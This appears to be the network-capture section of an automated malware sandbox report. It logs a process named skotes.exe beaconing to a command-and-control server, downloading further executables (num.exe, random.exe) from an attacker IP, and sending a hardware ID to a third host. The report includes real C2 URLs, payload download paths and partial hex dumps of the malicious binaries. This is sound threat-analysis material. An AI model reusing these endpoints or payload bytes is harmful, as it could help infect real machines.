                                                                                                                                      Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 9a c7 83 ae de a6 ed fd de a6 ed fd de a6 ed fd 6a 3a 1c fd fd a6 ed fd 6a 3a 1e fd 43 a6 ed fd 6a 3a 1f fd fd a6 ed fd 40 06 2a fd df a6 ed fd 8c ce e8 fc f3 a6 ed fd 8c ce e9 fc cc a6 ed fd 8c ce ee fc cb a6 ed fd d7 de 6e fd d7 a6 ed fd d7 de 7e fd fb a6 ed fd de a6 ec fd f7 a4 ed fd 7b cf e3 fc 8e a6 ed fd 7b cf ee fc df a6 ed fd 7b cf 12 fd df a6 ed fd de a6 7a fd df a6 ed fd 7b cf ef fc df a6 ed fd 52 69 63 68 de a6 ed fd 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 05 00 49 35 03 67 00 00 00 00 00 00 00 00 e0 00 22 01 0b 01 0e 10 00 ac 09 00 00 56 04 00 00 00 00 00 77 05 02 00 00 10 00 00 00 c0 [TRUNCATED]
                                                                                                                                      Data Ascii: MZ@ !L!This program cannot be run in DOS mode.$j:j:Cj:@*n~{{{z{RichPELI5g"Vw@`V@@@d|@u4@.text `.rdata@@.datalpH@.rsrc@@@.relocuv@B
                                                                                                                                      Oct 7, 2024 03:23:09.457281113 CEST224INData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 b9 74 0a 4d 00 e8 38 fd 01 00 68 e9 23 44 00 e8 8f f0 01 00 59 c3 68 f3 23 44 00 e8 83 f0 01 00 59 c3 e8 e6 de 01 00 68 f8 23
                                                                                                                                      Data Ascii: tM8h#DYh#DYh#DrYY<h#DaYQh$DOY0MQ@0MP#h$D/Y%h$DYh!$DYA2h&$DYPh0$D
                                                                                                                                      Oct 7, 2024 03:23:09.457346916 CEST1236INData Raw: 59 c3 b9 04 25 4d 00 e8 9d 98 00 00 68 3f 24 44 00 e8 d5 ef 01 00 59 c3 56 8b f1 8d 4e 18 e8 b4 87 00 00 8d 4e 08 e8 ac 87 00 00 6a 28 56 e8 e2 ec 01 00 59 59 8b c6 5e c2 04 00 55 8b ec 83 ec 38 c7 05 30 14 4d 00 74 c9 49 00 33 d2 c7 05 9c 18 4d
                                                                                                                                      Data Ascii: Y%Mh?$DYVNNj(VYY^U80MtI3M0IMMVQfMo0M@0M\I0MH,M3MMMMYMMM3MTMXM\M`MdMh
                                                                                                                                      Oct 7, 2024 03:23:09.457411051 CEST1236INData Raw: 04 e8 82 e8 01 00 8b f3 c7 87 4c fd ff ff 40 c9 49 00 59 39 9f 54 fd ff ff 0f 87 f2 0f 04 00 ff b7 50 fd ff ff 89 9f 54 fd ff ff e8 58 e8 01 00 8b f3 c7 87 3c fd ff ff 40 c9 49 00 59 39 9f 44 fd ff ff 0f 87 f1 0f 04 00 ff b7 40 fd ff ff 89 9f 44
                                                                                                                                      Data Ascii: L@IY9TPTX<@IY9D@D.,@IY9404Y$<IvY-
                                                                                                                                      Oct 7, 2024 03:23:09.457470894 CEST1236INData Raw: 15 4d 00 6a 0a 89 0d 38 15 4d 00 89 0d 3c 15 4d 00 89 0d 40 15 4d 00 a2 50 15 4d 00 66 a3 fc 16 4d 00 89 0d f4 16 4d 00 89 0d f8 16 4d 00 b9 fa 00 00 00 58 89 0d 14 17 4d 00 a3 44 15 4d 00 a3 48 15 4d 00 89 0d 4c 15 4d 00 c3 55 8b ec 57 8b f9 80
                                                                                                                                      Data Ascii: Mj8M<M@MPMfMMMXMDMHMLMUWrVj@YuON8w^_]UVuWVgFO GFGFGF aPF0G0_^]33@AQQQQA,Q Q(Q0V&N
                                                                                                                                      Oct 7, 2024 03:23:09.457515955 CEST272INData Raw: 85 33 08 04 00 80 7d ff 00 8d 8e 64 01 00 00 75 1e 80 be 6d 01 00 00 00 8b 8e 68 01 00 00 75 16 8b 49 04 8b 45 0c 41 89 08 5f 5e c9 c2 08 00 e8 de 08 00 00 eb f3 8b 49 30 eb e5 55 8b ec 83 ec 18 83 65 ec 00 8d 45 ec 83 65 f4 00 56 83 ce ff c7 45
                                                                                                                                      Data Ascii: 3}dumhuIEA_^I0UeEeVEVPuuxMM3M^At)ttH9AxUSVu3WyQ>t(M@f9X
                                                                                                                                      Oct 7, 2024 03:23:09.457750082 CEST1236INData Raw: ec 83 ec 1c 33 d2 42 53 56 57 8b c2 50 8d 50 01 89 55 fc e8 55 07 00 00 8b f8 85 ff 0f 84 c3 00 00 00 8d 4a ff 89 0d 28 15 4d 00 8b 4f 04 8b 31 66 83 7e 08 00 75 d3 8b 36 83 fe 20 74 05 83 fe 2b 75 c7 83 fe 2b 0f 94 c3 33 c0 83 fe 2b 0f 94 c0 8d
                                                                                                                                      Data Ascii: 3BSVWPPUUJ(MO1f~u6 t+u+3+fy4AEAEARUE{lMG3+DfxGuBAEESPEPEPWDMnwU%lMc3_^
                                                                                                                                      Oct 7, 2024 03:23:09.457798004 CEST1236INData Raw: 53 50 ff 75 f0 57 e8 0f 04 00 00 85 c0 0f 89 08 ff ff ff e9 82 00 00 00 8b 41 04 6a 7f 59 66 39 48 08 0f 85 c7 04 04 00 8b 45 f4 48 4f 83 bd 54 ff ff ff 00 89 45 f4 0f 84 9e 02 04 00 80 bd 5d ff ff ff 00 8b 45 bc 0f 85 96 02 04 00 8b 18 8d 8d 54
                                                                                                                                      Data Ascii: SPuWAjYf9HEHOTE]ETpXEE;1uuuuSRu3SxMxl`MTM_^[
                                                                                                                                      Oct 7, 2024 03:23:09.457844019 CEST1236INData Raw: 46 08 8b 0c b8 8b d1 8b 44 b8 04 89 4d f4 8b c8 89 45 f8 e8 dc a9 01 00 84 c0 75 13 8b 4e 0c 47 8d 41 ff 3b f8 7c d8 84 db 75 c9 5b 5f eb 8c 8b 46 08 b3 01 8b 4d f8 89 0c b8 8b 46 08 8b 4d f4 89 4c b8 04 eb d6 55 8b ec 83 e4 f8 b8 2c 00 02 00 e8
                                                                                                                                      Data Ascii: FDMEuNGA;|u[_FMFMLU,SVWL$(D$83Ph\$\$(ID$PuIM3#MG;D$PQhMhM,#MM#MD$D$P$<P
                                                                                                                                      Oct 7, 2024 03:23:09.457890987 CEST1236INData Raw: 7a 00 00 8d 45 94 50 8d 4d c0 e8 b9 40 00 00 68 84 ca 49 00 8d 4d e0 e8 d7 6d 00 00 53 6a 01 8d 45 c0 50 8d 45 e0 50 e8 2f 79 00 00 8d 4d e0 e8 9b 69 00 00 68 74 ca 49 00 8d 4d d0 c7 45 e0 00 01 00 00 89 5d e8 c7 45 ec 01 00 00 00 e8 a1 6d 00 00
                                                                                                                                      Data Ascii: zEPM@hIMmSjEPEP/yMihtIME]EmSSEPEPxMEciMluM"zEPM9}WhXIYYWh0IYYWhIYYWhIYYu>M8]uM
                                                                                                                                      Oct 7, 2024 03:23:09.462841988 CEST1236INData Raw: 00 00 8d 85 fc ff fe ff 8b ce 50 e8 b3 37 00 00 5e c9 c3 56 8b f1 56 e8 b3 15 02 00 59 85 c0 74 0f 66 83 7c 46 fe 5c 75 07 33 c9 66 89 4c 46 fe 5e c3 55 8b ec 56 57 8b f9 33 f6 46 8b 4f 0c 8b 01 3b c6 0f 8f de fc 03 00 51 ff 75 08 8b cf e8 06 00
                                                                                                                                      Data Ascii: P7^VVYtf|F\u3fLF^UVW3FO;Qu_^]USVWueYN3C;FPiq?PFuCP~3N_fH^[]U<EL$S3#MV4If#MW#M#M


                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                      3192.168.2.449836185.215.113.43807692C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                      Oct 7, 2024 03:23:12.788412094 CEST184OUTPOST /Zu7JuNko/index.php HTTP/1.1
                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                      Host: 185.215.113.43
                                                                                                                                      Content-Length: 31
                                                                                                                                      Cache-Control: no-cache
                                                                                                                                      Data Raw: 64 31 3d 31 30 30 30 33 33 32 30 30 31 26 75 6e 69 74 3d 32 34 36 31 32 32 36 35 38 33 36 39
                                                                                                                                      Data Ascii: d1=1000332001&unit=246122658369
                                                                                                                                      Oct 7, 2024 03:23:13.484791040 CEST193INHTTP/1.1 200 OK
                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                      Date: Mon, 07 Oct 2024 01:23:13 GMT
                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                      Connection: keep-alive
                                                                                                                                      Data Raw: 34 0d 0a 20 3c 63 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                      Data Ascii: 4 <c>0


                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                      4192.168.2.449842185.215.113.103807692C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                      Oct 7, 2024 03:23:13.493395090 CEST53OUTGET /test/num.exe HTTP/1.1
                                                                                                                                      Host: 185.215.113.103
                                                                                                                                      Oct 7, 2024 03:23:14.334355116 CEST1236INHTTP/1.1 200 OK
                                                                                                                                      Date: Mon, 07 Oct 2024 01:23:14 GMT
                                                                                                                                      Server: Apache/2.4.52 (Ubuntu)
                                                                                                                                      Last-Modified: Sun, 29 Sep 2024 08:19:54 GMT
                                                                                                                                      ETag: "4cc00-6233dc0bf3e80"
                                                                                                                                      Accept-Ranges: bytes
                                                                                                                                      Content-Length: 314368
                                                                                                                                      Content-Type: application/x-msdos-program
                                                                                                                                      Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 bd cf 9d 43 f9 ae f3 10 f9 ae f3 10 f9 ae f3 10 96 d8 58 10 e1 ae f3 10 96 d8 6d 10 f4 ae f3 10 96 d8 59 10 c0 ae f3 10 f0 d6 70 10 fa ae f3 10 79 d7 f2 11 fb ae f3 10 f0 d6 60 10 fe ae f3 10 f9 ae f2 10 97 ae f3 10 96 d8 5c 10 eb ae f3 10 96 d8 6e 10 f8 ae f3 10 52 69 63 68 f9 ae f3 10 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 04 00 4a 9a f9 66 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 0a 00 00 ce 01 00 00 1a 24 00 00 00 00 00 f0 69 01 00 00 10 00 00 00 e0 01 00 00 00 40 00 00 10 00 00 00 02 00 00 05 00 01 00 00 00 00 00 05 00 01 00 00 00 00 00 00 10 26 00 00 04 00 00 00 00 00 00 02 00 40 81 00 00 10 00 00 10 00 00 00 00 [TRUNCATED]
                                                                                                                                      Data Ascii: MZ@!L!This program cannot be run in DOS mode.$CXmYpy`\nRichPELJf$i@&@(<%$.text .rdata@@.data#@.relocE%F@B
                                                                                                                                      Oct 7, 2024 03:23:14.334383965 CEST1236INData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 60 dc 41 00 00 00 00 00 00 00 00 00 81 ce 41 00 ea ce 41 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                      Data Ascii: `AAAUQEE}tMUUEEE]UEExMUMMM]UQSjh0hAj(dEPtX
                                                                                                                                      Oct 7, 2024 03:23:14.334400892 CEST1236INData Raw: fc ff ff 52 e8 eb 92 01 00 81 ec 88 00 00 00 8b cc 8d 45 08 50 e8 ca 00 00 00 8d 8d a4 fb ff ff 51 e8 be 3c 01 00 81 c4 a0 00 00 00 8d 8d a4 fb ff ff e8 1d 93 01 00 8d 8d f8 fb ff ff e8 e2 95 01 00 50 ff 15 90 a7 64 00 8d 8d f8 fb ff ff e8 40 95
                                                                                                                                      Data Ascii: REPQ<Pd@5jjRAM]UQMM|MHM<M0}MO]UQMEPM
                                                                                                                                      Oct 7, 2024 03:23:14.334415913 CEST672INData Raw: 42 00 8d 95 cc fe ff ff 52 ff 15 9c a8 64 00 85 c0 75 05 e9 7d 04 00 00 68 1f 0e 42 00 8d 8d 94 fe ff ff e8 98 8d 01 00 83 7d 30 00 0f 84 e6 00 00 00 8d 45 24 50 8d 8d 6c fd ff ff 51 68 fc 54 42 00 8d 95 78 fd ff ff 52 8d 85 cc fe ff ff 50 8d 8d
                                                                                                                                      Data Ascii: BRdu}hB}0E$PlQhTBxRPQhTTBREPQhSBREPQ}PZlx
                                                                                                                                      Oct 7, 2024 03:23:14.334433079 CEST1236INData Raw: 8c 01 00 8d 8d f0 fc ff ff e8 d2 8b 01 00 83 7d 30 00 74 4d 8d 55 24 52 8d 85 d8 fc ff ff 50 68 44 58 42 00 8d 8d e4 fc ff ff 51 8d 8d 80 fe ff ff e8 5a 8d 01 00 8b c8 e8 c3 8c 01 00 50 8d 8d 80 fe ff ff e8 37 8c 01 00 8d 8d d8 fc ff ff e8 8c 8b
                                                                                                                                      Data Ascii: }0tMU$RPhDXBQZP70RPPOh#BtjQnPRdPQt'Pt
                                                                                                                                      Oct 7, 2024 03:23:14.334460020 CEST1236INData Raw: 45 08 83 c0 10 5d c3 cc cc cc cc cc 55 8b ec 8b 45 08 83 e8 10 5d c3 cc cc cc cc cc 55 8b ec 83 ec 0c 83 3d 90 a9 64 00 00 75 12 68 00 00 20 00 68 98 a0 44 00 e8 32 fe ff ff 83 c4 08 8b 45 08 83 c0 10 50 e8 b3 fe ff ff 83 c4 04 89 45 f8 8b 4d f8
                                                                                                                                      Data Ascii: E]UE]U=duh hD2EPEMQdR]E}uEPdQAE}u3TUjaEM9A~*UB+EPMQpEUEdMQ ]UQ}
                                                                                                                                      Oct 7, 2024 03:23:14.334476948 CEST1236INData Raw: 0c a3 cc a1 64 00 6a 09 68 50 1f 42 00 68 5c 1f 42 00 e8 e1 1f 00 00 83 c4 0c a3 94 a3 64 00 6a 14 68 68 1f 42 00 68 80 1f 42 00 e8 c8 1f 00 00 83 c4 0c a3 28 a1 64 00 6a 06 68 98 1f 42 00 68 a0 1f 42 00 e8 af 1f 00 00 83 c4 0c a3 14 a4 64 00 6a
                                                                                                                                      Data Ascii: djhPBh\BdjhhBhB(djhBhBdjhBhBPdjhBhB}@djhBhBddjhBhBKdjhBh B2d]Ujh Bh( Bd
                                                                                                                                      Oct 7, 2024 03:23:14.334494114 CEST1236INData Raw: 83 c4 0c a3 28 a6 64 00 6a 0e 68 70 24 42 00 68 80 24 42 00 e8 0b 1b 00 00 83 c4 0c a3 4c a4 64 00 6a 09 68 90 24 42 00 68 9c 24 42 00 e8 f2 1a 00 00 83 c4 0c a3 e0 a4 64 00 6a 0b 68 a8 24 42 00 68 b4 24 42 00 e8 d9 1a 00 00 83 c4 0c a3 4c a5 64
                                                                                                                                      Data Ascii: (djhp$Bh$BLdjh$Bh$Bdjh$Bh$BLdjh$Bh$Bhdjh$Bh$B\djh$Bh%Bdj h%Bh<%Budjh`%Bhp%B\ djh%Bh%BChdjh%Bh%
                                                                                                                                      Oct 7, 2024 03:23:14.334512949 CEST1236INData Raw: 48 2b 42 00 68 5c 2b 42 00 e8 42 16 00 00 83 c4 0c a3 10 a5 64 00 6a 05 68 70 2b 42 00 68 78 2b 42 00 e8 29 16 00 00 83 c4 0c a3 30 a5 64 00 6a 0b 68 80 2b 42 00 68 8c 2b 42 00 e8 10 16 00 00 83 c4 0c a3 48 a3 64 00 6a 09 68 98 2b 42 00 68 a4 2b
                                                                                                                                      Data Ascii: H+Bh\+BBdjhp+Bhx+B)0djh+Bh+BHdjh+Bh+Bdjh+Bh+B`djh+Bh+Bdjh,Bh,B,djh ,Bh,,Bdjh8,BhL,Bzxdjh`,Bhp,Ba
                                                                                                                                      Oct 7, 2024 03:23:14.334531069 CEST1236INData Raw: 11 00 00 83 c4 0c a3 20 a6 64 00 6a 0f 68 00 32 42 00 68 10 32 42 00 e8 60 11 00 00 83 c4 0c a3 10 a3 64 00 6a 0f 68 20 32 42 00 68 30 32 42 00 e8 47 11 00 00 83 c4 0c a3 a4 a4 64 00 6a 3d 68 40 32 42 00 68 80 32 42 00 e8 2e 11 00 00 83 c4 0c a3
                                                                                                                                      Data Ascii: djh2Bh2B`djh 2Bh02BGdj=h@2Bh2B.4djh2Bh2B|djh2Bh2B$djh2Bh2B\djh3Bh3Bdjh3Bh3Bdjh(3Bh03BPdjh83B
                                                                                                                                      Oct 7, 2024 03:23:14.334554911 CEST1236INData Raw: 6a 11 68 e0 39 42 00 68 f4 39 42 00 e8 97 0c 00 00 83 c4 0c a3 ac a0 64 00 6a 14 68 08 3a 42 00 68 20 3a 42 00 e8 7e 0c 00 00 83 c4 0c a3 a4 a0 64 00 6a 0b 68 38 3a 42 00 68 44 3a 42 00 e8 65 0c 00 00 83 c4 0c a3 d8 a5 64 00 6a 0c 68 50 3a 42 00
                                                                                                                                      Data Ascii: jh9Bh9Bdjh:Bh :B~djh8:BhD:BedjhP:Bh`:BLdjhp:Bhx:B3djh:Bh:Bdjh:Bh:Bdjh:Bh:Bdjh:Bh:Bdj,h:Bh;B


                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                      5192.168.2.449854185.215.113.37802488C:\Users\user\AppData\Local\Temp\1000336001\num.exe
                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                      Oct 7, 2024 03:23:15.057343960 CEST89OUTGET / HTTP/1.1
                                                                                                                                      Host: 185.215.113.37
                                                                                                                                      Connection: Keep-Alive
                                                                                                                                      Cache-Control: no-cache
                                                                                                                                      Oct 7, 2024 03:23:15.772275925 CEST203INHTTP/1.1 200 OK
                                                                                                                                      Date: Mon, 07 Oct 2024 01:23:15 GMT
                                                                                                                                      Server: Apache/2.4.52 (Ubuntu)
                                                                                                                                      Content-Length: 0
                                                                                                                                      Keep-Alive: timeout=5, max=100
                                                                                                                                      Connection: Keep-Alive
                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                      Oct 7, 2024 03:23:15.774722099 CEST412OUTPOST /e2b1563c6670f193.php HTTP/1.1
                                                                                                                                      Content-Type: multipart/form-data; boundary=----CFHDBFIEGIDGIECBKJEC
                                                                                                                                      Host: 185.215.113.37
                                                                                                                                      Content-Length: 211
                                                                                                                                      Connection: Keep-Alive
                                                                                                                                      Cache-Control: no-cache
                                                                                                                                      Data Raw: 2d 2d 2d 2d 2d 2d 43 46 48 44 42 46 49 45 47 49 44 47 49 45 43 42 4b 4a 45 43 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 35 33 41 44 45 33 35 43 45 33 41 33 33 39 37 33 35 34 34 31 38 37 0d 0a 2d 2d 2d 2d 2d 2d 43 46 48 44 42 46 49 45 47 49 44 47 49 45 43 42 4b 4a 45 43 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 22 0d 0a 0d 0a 64 6f 6d 61 0d 0a 2d 2d 2d 2d 2d 2d 43 46 48 44 42 46 49 45 47 49 44 47 49 45 43 42 4b 4a 45 43 2d 2d 0d 0a
                                                                                                                                      Data Ascii: ------CFHDBFIEGIDGIECBKJECContent-Disposition: form-data; name="hwid"53ADE35CE3A33973544187------CFHDBFIEGIDGIECBKJECContent-Disposition: form-data; name="build"doma------CFHDBFIEGIDGIECBKJEC--
                                                                                                                                      Oct 7, 2024 03:23:16.011244059 CEST210INHTTP/1.1 200 OK
                                                                                                                                      Date: Mon, 07 Oct 2024 01:23:15 GMT
                                                                                                                                      Server: Apache/2.4.52 (Ubuntu)
                                                                                                                                      Content-Length: 8
                                                                                                                                      Keep-Alive: timeout=5, max=99
                                                                                                                                      Connection: Keep-Alive
                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                      Data Raw: 59 6d 78 76 59 32 73 3d
                                                                                                                                      Data Ascii: YmxvY2s=


                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                      6192.168.2.449872185.215.113.43807692C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                      Oct 7, 2024 03:23:17.128875017 CEST184OUTPOST /Zu7JuNko/index.php HTTP/1.1
                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                      Host: 185.215.113.43
                                                                                                                                      Content-Length: 31
                                                                                                                                      Cache-Control: no-cache
                                                                                                                                      Data Raw: 64 31 3d 31 30 30 30 33 33 36 30 30 31 26 75 6e 69 74 3d 32 34 36 31 32 32 36 35 38 33 36 39
                                                                                                                                      Data Ascii: d1=1000336001&unit=246122658369
                                                                                                                                      Oct 7, 2024 03:23:17.841730118 CEST193INHTTP/1.1 200 OK
                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                      Date: Mon, 07 Oct 2024 01:23:17 GMT
                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                      Connection: keep-alive
                                                                                                                                      Data Raw: 34 0d 0a 20 3c 63 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                      Data Ascii: 4 <c>0


                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                      7192.168.2.449879185.215.113.103807692C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                      Oct 7, 2024 03:23:17.850703955 CEST56OUTGET /luma/random.exe HTTP/1.1
                                                                                                                                      Host: 185.215.113.103
                                                                                                                                      Oct 7, 2024 03:23:18.561058044 CEST1236INHTTP/1.1 200 OK
                                                                                                                                      Date: Mon, 07 Oct 2024 01:23:18 GMT
                                                                                                                                      Server: Apache/2.4.52 (Ubuntu)
                                                                                                                                      Last-Modified: Mon, 07 Oct 2024 00:46:48 GMT
                                                                                                                                      ETag: "1bea00-623d85b170f6f"
                                                                                                                                      Accept-Ranges: bytes
                                                                                                                                      Content-Length: 1829376
                                                                                                                                      Content-Type: application/x-msdos-program
                                                                                                                                      Data Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 07 00 4a f1 ff 66 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 0e 00 00 a0 04 00 00 dc 00 00 00 00 00 00 00 20 49 00 00 10 00 00 00 00 00 00 00 00 40 00 00 10 00 00 00 02 00 00 06 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 50 49 00 00 04 00 00 19 15 1c 00 02 00 40 80 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 57 f0 05 00 6b 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f8 f1 05 00 08 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 [TRUNCATED]
                                                                                                                                      Data Ascii: MZx@x!L!This program cannot be run in DOS mode.$PELJf I@PI@Wk ^@.rsrc n@.idata n@ )p@kawjnymvP/Pr@ldklrfivI@.taggant0 I"@
                                                                                                                                      Oct 7, 2024 03:23:18.561081886 CEST224INData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                      Data Ascii:
                                                                                                                                      Oct 7, 2024 03:23:18.561093092 CEST1236INData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                      Data Ascii:
                                                                                                                                      Oct 7, 2024 03:23:18.561136961 CEST1236INData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                      Data Ascii:
                                                                                                                                      Oct 7, 2024 03:23:18.561147928 CEST1236INData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                      Data Ascii:
                                                                                                                                      Oct 7, 2024 03:23:18.561158895 CEST672INData Raw: b4 36 45 6a 6f 04 41 0a 2f 20 f4 74 f7 be 76 c7 48 2f 87 62 6d 8e b0 16 ad 40 1a d5 52 84 fe 4b 20 cd 05 6b 57 a3 13 f6 d9 10 c6 e0 18 ff 6c 8a 3a 38 c8 d8 d7 29 ba 48 97 da bb 63 90 ef 12 90 18 46 d8 dd 15 b7 54 4e 1e dd b9 8a fe b0 eb a7 a2 0c
                                                                                                                                      Data Ascii: 6EjoA/ tvH/bm@RK kWl:8)HcFTNf[+,>/44xR5(Xe,`h&SR`-P_L#*:53r0 !R) Wgo*w(Mx!j:|i[
                                                                                                                                      Oct 7, 2024 03:23:18.561199903 CEST1236INData Raw: 20 e1 f9 10 c1 7c 47 5a 40 c9 25 a6 5c 6d 2c 5f c7 d5 6e 86 77 30 95 e2 8a 82 2d ac 90 f0 13 af d8 d9 ee 06 01 e7 d6 e5 47 65 6b ee 99 e1 c9 6e e2 e0 0b bd 5c 0a 7c 47 18 09 38 6a ed ee c0 49 3e d9 45 ee 35 fc ab f2 fc 04 6b c0 f0 38 f9 96 86 c1
                                                                                                                                      Data Ascii: |GZ@%\m,_nw0-Gekn\|G8jI>E5k8;+Cw!$%F_^f<\F;9*_i/iML:o1,*%:X2wGR843!H}63og'$P\x.2y(.XH173
                                                                                                                                      Oct 7, 2024 03:23:18.561211109 CEST1236INData Raw: 95 fa 55 24 80 f2 ee a4 0a 42 27 12 d9 f1 6d c0 18 ff 6c 94 bd 13 a8 88 4b a5 16 7d 1b 20 77 5e 4e f1 c6 d0 64 2d fe de 18 67 54 6e 25 66 f5 6e 21 52 61 2e d0 15 ec ed 17 11 61 1b 70 23 f5 f8 19 28 fd 4c 37 61 42 67 2b 09 e9 83 20 1b d8 5f 87 00
                                                                                                                                      Data Ascii: U$B'mlK} w^Nd-gTn%fn!Ra.ap#(L7aBg+ _HR+|!<IE0(Xi^6)=8U1osl/\/8Lpoh3x(!Hgv#L:Q6x-i6a{FVJ+%9:^?}Fhfo-gT*B~
                                                                                                                                      Oct 7, 2024 03:23:18.561220884 CEST1236INData Raw: c2 3a 3f 03 d8 06 1e 71 42 07 f8 47 1c 24 aa 00 1d 36 49 c1 40 29 63 f8 db 64 65 5f bf f2 a7 fb f0 57 14 e5 aa 9c 72 86 4c 10 1a 57 10 3a eb 47 75 92 07 37 d9 08 67 83 21 fa a4 d8 77 03 c4 76 c4 a8 8b 18 2b ce c6 d9 67 fd 6e 9e a0 27 bf d6 9e 3c
                                                                                                                                      Data Ascii: :?qBG$6I@)cde_WrLW:Gu7g!wv+gn'<USd84 qX?WJ[_b"ial\f*=Yj5HAv8 !.!?oxK&wz!%$V$/i"co/z_h(EI
